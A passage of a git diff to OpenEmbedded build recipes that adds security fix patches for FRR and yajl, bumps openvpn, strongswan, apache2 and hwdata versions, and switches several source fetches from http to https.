/* Finally intern unknown attribute. */ + if (transit) + bgp_attr_set_transit(attr, transit_intern(transit)); +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb b/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb index bddc08aebb..c447df0512 100644 --- a/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb @@ -9,9 +9,15 @@ LICENSE = "GPL-2.0-only & LGPL-2.1-only" LIC_FILES_CHKSUM = "file://doc/licenses/GPL-2.0;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://doc/licenses/LGPL-2.1;md5=4fbd65380cdd255951079008b364516c" +PR = "r1" + SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/9.0 \ file://frr.pam \ file://0001-tools-make-quiet-actually-suppress-output.patch \ + file://CVE-2023-46752.patch \ + file://CVE-2023-46753.patch \ + file://CVE-2023-47235.patch \ + file://CVE-2023-47234.patch \ " SRCREV = "31ed3dd753d62b5d8916998bc32814007e91364b" diff --git a/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb b/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb index a5fc158749..3688ce4091 100644 --- a/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb +++ b/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb @@ -2,7 +2,7 @@ SUMMARY = "A full-featured SSL VPN solution via tun device." HOMEPAGE = "https://openvpn.net/" SECTION = "net" LICENSE = "GPL-2.0-only" -LIC_FILES_CHKSUM = "file://COPYING;md5=3170e982baae61dbb8de963317d1ac94" +LIC_FILES_CHKSUM = "file://COPYING;md5=d8d34ce6390552676e4ce8279f13c48a" DEPENDS = "lzo lz4 openssl iproute2 libcap-ng ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}" inherit autotools systemd update-rc.d pkgconfig @@ -14,7 +14,7 @@ SRC_URI = "http://swupdate.openvpn.org/community/releases/${BP}.tar.gz \ UPSTREAM_CHECK_URI = "https://openvpn.net/community-downloads" -SRC_URI[sha256sum] = "13b207a376d8880507c74ff78aabc3778a9da47c89f1e247dcee3c7237138ff6" +SRC_URI[sha256sum] = "3b074f392818b31aa529b84f76e8b5e4ad03fca764924f46d906bceaaf421034" CVE_STATUS[CVE-2020-27569] = "not-applicable-config: Applies only Aviatrix OpenVPN client, not openvpn" diff --git a/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb b/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb index fb1bea2d87..87d12bc6c8 100644 --- a/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb +++ b/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb @@ -11,7 +11,7 @@ DEPENDS:append = "${@bb.utils.contains('DISTRO_FEATURES', 'tpm2', ' tpm2-tss', SRC_URI = "https://download.strongswan.org/strongswan-${PV}.tar.bz2 \ " -SRC_URI[sha256sum] = "ddf53f1f26ad26979d5f55e8da95bd389552f5de3682e35593f9a70b2584ed2d" +SRC_URI[sha256sum] = "5e6018b07cbe9f72c044c129955a13be3e2f799ceb53f53a4459da6a922b95e5" UPSTREAM_CHECK_REGEX = "strongswan-(?P<pver>\d+(\.\d+)+)\.tar" diff --git a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb index a5d614961a..8db456b99c 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb @@ -42,4 +42,6 @@ RDEPENDS:${PN} += " \ dnf \ libnewt-python \ " +BBCLASSEXTEND = "nativesdk" + SKIP_RECIPE[dnf-plugin-tui] ?= "${@bb.utils.contains('PACKAGE_CLASSES', 'package_rpm', '', 'does not build correctly without package_rpm in PACKAGE_CLASSES', d)}" diff --git a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb index d30d9c3466..19ef987387 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb @@ -7,7 +7,7 @@ RDEPENDS:${PN} = "libusb1" SRC_URI = " \ git://repo.or.cz/openocd.git;protocol=http;name=openocd;branch=master \ git://repo.or.cz/r/git2cl.git;protocol=http;destsuffix=tools/git2cl;name=git2cl;branch=master \ - git://github.com/msteveb/jimtcl.git;protocol=http;destsuffix=git/jimtcl;name=jimtcl;branch=master \ + git://github.com/msteveb/jimtcl.git;protocol=https;destsuffix=git/jimtcl;name=jimtcl;branch=master \ git://repo.or.cz/r/libjaylink.git;protocol=http;destsuffix=git/src/jtag/drivers/libjaylink;name=libjaylink;branch=master \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch new file mode 100644 index 0000000000..1241ff9e31 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch @@ -0,0 +1,37 @@ +From 0b5e73c4321de0ba1d495fdc0967054b2a77931c Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com> +Date: Mon, 10 Jul 2023 13:36:10 +0100 +Subject: [PATCH] Fix for CVE-2017-16516 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Description: Fix for CVE-2017-16516 + Potential buffer overread: A JSON file can cause denial of service. +Origin: https://github.com/brianmario/yajl-ruby/commit/a8ca8f476655adaa187eedc60bdc770fff3c51ce + +CVE: CVE-2017-16516 +Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/248] +Signed-off-by: Ross Burton <ross.burton@arm.com> +--- + src/yajl_encode.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/yajl_encode.c b/src/yajl_encode.c +index fd08258..0d97cc5 100644 +--- a/src/yajl_encode.c ++++ b/src/yajl_encode.c +@@ -139,8 +139,8 @@ void yajl_string_decode(yajl_buf buf, const unsigned char * str, + end+=3; + /* check if this is a surrogate */ + if ((codepoint & 0xFC00) == 0xD800) { +- end++; +- if (str[end] == '\\' && str[end + 1] == 'u') { ++ if (end + 2 < len && str[end + 1] == '\\' && str[end + 2] == 'u') { ++ end++; + unsigned int surrogate = 0; + hexToDigit(&surrogate, str + end + 2); + codepoint = +-- +2.34.1 + diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch new file mode 100644 index 0000000000..0dc859099d --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch @@ -0,0 +1,59 @@ +From 17de4d15687aa30c49660dc4b792b1fb4d38b569 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Petr=20P=C3=ADsa=C5=99?= <ppisar@redhat.com> +Date: Thu, 7 Apr 2022 17:29:54 +0200 +Subject: [PATCH] Fix CVE-2022-24795 + +There was an integer overflow in yajl_buf_ensure_available() leading +to allocating less memory than requested. Then data were written past +the allocated heap buffer in yajl_buf_append(), the only caller of +yajl_buf_ensure_available(). Another result of the overflow was an +infinite loop without a return from yajl_buf_ensure_available(). + +yajl-ruby project, which bundles yajl, fixed it +<https://github.com/brianmario/yajl-ruby/pull/211> by checking for the +integer overflow, fortifying buffer allocations, and report the +failures to a caller. But then the caller yajl_buf_append() skips +a memory write if yajl_buf_ensure_available() failed leading to a data +corruption. + +A yajl fork mainter recommended calling memory allocation callbacks with +the large memory request and let them to handle it. But that has the +problem that it's not possible pass the overely large size to the +callbacks. + +This patch catches the integer overflow and terminates the process +with abort(). + +CVE: CVE-2022-24795 +Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/239] +Signed-off-by: Ross Burton <ross.burton@arm.com> +--- + src/yajl_buf.c | 12 +++++++++++- + 1 file changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/yajl_buf.c b/src/yajl_buf.c +index 1aeafde..55c11ad 100644 +--- a/src/yajl_buf.c ++++ b/src/yajl_buf.c +@@ -45,7 +45,17 @@ void yajl_buf_ensure_available(yajl_buf buf, size_t want) + + need = buf->len; + +- while (want >= (need - buf->used)) need <<= 1; ++ if (((buf->used > want) ? buf->used : want) > (size_t)(buf->used + want)) { ++ /* We cannot allocate more memory than SIZE_MAX. */ ++ abort(); ++ } ++ while (want >= (need - buf->used)) { ++ if (need >= (size_t)((size_t)(-1)<<1)>>1) { ++ /* need would overflow. */ ++ abort(); ++ } ++ need <<= 1; ++ } + + if (need != buf->len) { + buf->data = (unsigned char *) YA_REALLOC(buf->alloc, buf->data, need); +-- +2.34.1 + diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch new file mode 100644 index 0000000000..47454dc8af --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch @@ -0,0 +1,35 @@ +Fix memory leaks. Taken from the Fedora packaging (https://src.fedoraproject.org/rpms/yajl) +where it was backported from openEuler. + +CVE: CVE-2023-33460 +Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/250] +Signed-off-by: Ross Burton <ross.burton@arm.com> + +diff --git a/src/yajl_tree.c b/src/yajl_tree.c +index 3d357a3..56c7012 100644 +--- a/src/yajl_tree.c ++++ b/src/yajl_tree.c +@@ -143,7 +143,7 @@ static yajl_val context_pop(context_t *ctx) + ctx->stack = stack->next; + + v = stack->value; +- ++ free (stack->key); + free (stack); + + return (v); +@@ -444,7 +444,14 @@ yajl_val yajl_tree_parse (const char *input, + snprintf(error_buffer, error_buffer_size, "%s", internal_err_str); + YA_FREE(&(handle->alloc), internal_err_str); + } ++ while(ctx.stack != NULL) { ++ yajl_val v = context_pop(&ctx); ++ yajl_tree_free(v); ++ } + yajl_free (handle); ++ //If the requested memory is not released in time, it will cause memory leakage ++ if(ctx.root) ++ yajl_tree_free(ctx.root); + return NULL; + } + diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb index cf8dbb183e..2a34210f3c 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb @@ -8,7 +8,11 @@ HOMEPAGE = "http://lloyd.github.com/yajl/" LICENSE = "ISC" LIC_FILES_CHKSUM = "file://COPYING;md5=39af6eb42999852bdd3ea00ad120a36d" -SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https" +SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https \ + file://CVE-2017-16516.patch \ + file://CVE-2022-24795.patch \ + file://CVE-2023-33460.patch \ + " SRCREV = "a0ecdde0c042b9256170f2f8890dd9451a4240aa" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb b/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb index 95cb29775a..0382e6bdfe 100644 --- a/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb +++ b/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb @@ -13,7 +13,7 @@ inherit cmake pkgconfig binconfig PACKAGES =+ "geoslib ${PN}-c1" DESCRIPTION:${PN}lib = "Geometry engine for Geographic Information Systems - C++ Library" -FILES:${PN}lib += "${libdir}/libgeos-${PV}.so" +FILES:${PN}lib += "${libdir}/libgeos.so.*" DESCRIPTION:${PN}-c1 = "Geometry engine for Geographic Information Systems - C Library" FILES:${PN}-c1 += "${libdir}/libgeos_c.so.*" diff --git a/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb b/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb index 68b91c0b0c..e716430673 100644 --- a/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb @@ -7,7 +7,7 @@ SECTION = "libs" LICENSE = "HDF5" LIC_FILES_CHKSUM = "file://COPYING;md5=9ba0f3d878ab6c2403c86e9b0362d998" -inherit cmake siteinfo qemu multilib_header +inherit cmake siteinfo qemu multilib_header multilib_script DEPENDS += "qemu-native zlib" @@ -40,6 +40,10 @@ EOF do_unpack[postfuncs] += "gen_emu" +MULTILIB_SCRIPTS += "${PN}:${bindir}/h5cc \ + ${PN}:${bindir}/h5hlcc \ +" + do_install:append() { # Used for generating config files on target install -m 755 ${B}/bin/H5detect ${D}${bindir} diff --git a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb index 56d4253772..b834069733 100644 --- a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb +++ b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb @@ -5,7 +5,7 @@ SECTION = "System/Base" LICENSE = "GPL-2.0-or-later | XFree86-1.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=1556547711e8246992b999edd9445a57" -SRCREV = "21cb47beb1716545b25dfe8ae1b9e079c73b85d9" +SRCREV = "b9ba5bc9eecbeeff441806695b227c3c3de4755c" SRC_URI = "git://github.com/vcrhonek/${BPN}.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb index 926a603b81..28e40f66e3 100644 --- a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb +++ b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb @@ -10,7 +10,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "6e83cc6f6dff4f126fc79284e0c3c1c50123380d" -SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=main;protocol=https" +SRC_URI = "git://github.com/storaged-project/libbytesize;branch=main;protocol=https" inherit gettext autotools pkgconfig python3native diff --git a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb index ae4b3b9bf6..a7a9019e33 100644 --- a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb +++ b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb @@ -29,7 +29,7 @@ DEPENDS = "libdevmapper \ LICENSE = "GPL-2.0-only" -SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=http;branch=master \ +SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=https;branch=master \ file://multipathd.oe \ file://multipath.conf.example \ file://0021-RH-fixup-udev-rules-for-redhat.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb index 12532e4ef1..dc73497257 100644 --- a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb @@ -8,13 +8,13 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=4267f48fc738f50380cbeeb76f95cebc" # These dependencies are required by Foundation DEPENDS = "libpcre2 zlib" -SRC_URI = "git://github.com/pocoproject/poco.git;branch=master;protocol=https \ +SRC_URI = "git://github.com/pocoproject/poco.git;branch=poco-1.12.4;protocol=https \ file://0001-Use-std-atomic-int-instead-of-std-atomic-bool.patch \ file://0001-cppignore.lnx-Ignore-PKCS12-and-testLaunch-test.patch \ file://0001-Fix-data-race-when-create-POSIX-thread.patch \ file://run-ptest \ " -SRCREV = "1211613642269b7d53bea58b02de7fcd25ece3b9" +SRCREV = "3572a1fb981672e2cd1d2533ffd836da7db0f414" UPSTREAM_CHECK_GITTAGREGEX = "poco-(?P<pver>\d+(\.\d+)+)" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb index 21c36687e2..bfb0aaf5e7 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=6542fc4ce5904ffb741ef56f8fe33452" -SRC_URI = "git://github.com/gcovr/gcovr.git;branch=master;protocol=https" +SRC_URI = "git://github.com/gcovr/gcovr.git;branch=main;protocol=https" SRCREV = "1221ef62ff0de15bbeaf79e68e08a65d62c73ff4" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb index ec7747307d..2f94f7a6a5 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb @@ -9,4 +9,6 @@ inherit pypi setuptools3 PYPI_PACKAGE = "ninja_syntax" UPSTREAM_CHECK_URI = "https://pypi.python.org/pypi/ninja_syntax/" -UPSTREAM_CHECK_REGEX = "/ninja_syntax/(?P<pver>(\d+[\.\-_]*)+)"
\ No newline at end of file +UPSTREAM_CHECK_REGEX = "/ninja_syntax/(?P<pver>(\d+[\.\-_]*)+)" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb index dd07968f03..3b9077f326 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb @@ -22,3 +22,4 @@ RDEPENDS:${PN} = " \ python3-ninja-syntax \ " +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb b/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb index b72589368d..fadcc32c24 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb @@ -4,7 +4,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=e664eb75e2791c2e505e6e1c274e6d4f" SRCREV = "218d310e3d840715b1c8e67cefd5b6d71a2d7a1a" -SRC_URI = "git://github.com/NordicSemiconductor/piccata.git;protocol=http;branch=master" +SRC_URI = "git://github.com/NordicSemiconductor/piccata.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch deleted file mode 100644 index 9accbf18a1..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch +++ /dev/null @@ -1,31 +0,0 @@ -From 5c9257fa34335ff83f7c01581cf953111072a457 Mon Sep 17 00:00:00 2001 -From: Valeria Petrov <valeria.petrov@spinetix.com> -Date: Tue, 18 Apr 2023 15:38:53 +0200 -Subject: [PATCH] * modules/mappers/config9.m4: Add 'server' directory to - include path if mod_rewrite is enabled. - -Upstream-Status: Backport [https://svn.apache.org/viewvc?view=revision&revision=1909241] - ---- - modules/mappers/config9.m4 | 5 +++++ - 1 file changed, 5 insertions(+) - -diff --git a/modules/mappers/config9.m4 b/modules/mappers/config9.m4 -index 55a97ab993..7120b729b7 100644 ---- a/modules/mappers/config9.m4 -+++ b/modules/mappers/config9.m4 -@@ -14,6 +14,11 @@ APACHE_MODULE(userdir, mapping of requests to user-specific directories, , , mos - APACHE_MODULE(alias, mapping of requests to different filesystem parts, , , yes) - APACHE_MODULE(rewrite, rule based URL manipulation, , , most) - -+if test "x$enable_rewrite" != "xno"; then -+ # mod_rewrite needs test_char.h -+ APR_ADDTO(INCLUDES, [-I\$(top_builddir)/server]) -+fi -+ - APR_ADDTO(INCLUDES, [-I\$(top_srcdir)/$modpath_current]) - - APACHE_MODPATH_FINISH --- -2.25.1 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb index 00f8aaa415..e4f7e1ceb8 100644 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb +++ b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb @@ -16,7 +16,6 @@ SRC_URI = "${APACHE_MIRROR}/httpd/httpd-${PV}.tar.bz2 \ file://0008-Fix-perl-install-directory-to-usr-bin.patch \ file://0009-support-apxs.in-force-destdir-to-be-empty-string.patch \ file://0001-make_exports.awk-not-expose-the-path.patch \ - file://0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch \ " SRC_URI:append:class-target = " \ @@ -28,7 +27,7 @@ SRC_URI:append:class-target = " \ " LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3" -SRC_URI[sha256sum] = "dbccb84aee95e095edfbb81e5eb926ccd24e6ada55dcd83caecb262e5cf94d2a" +SRC_URI[sha256sum] = "fa16d72a078210a54c47dd5bef2f8b9b8a01d94909a51453956b3ec6442ea4c5" S = "${WORKDIR}/httpd-${PV}" @@ -36,7 +35,7 @@ inherit autotools update-rc.d pkgconfig systemd update-alternatives DEPENDS = "openssl expat pcre apr apr-util apache2-native " -CVE_PRODUCT = "http_server" +CVE_PRODUCT = "apache:http_server" SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice" |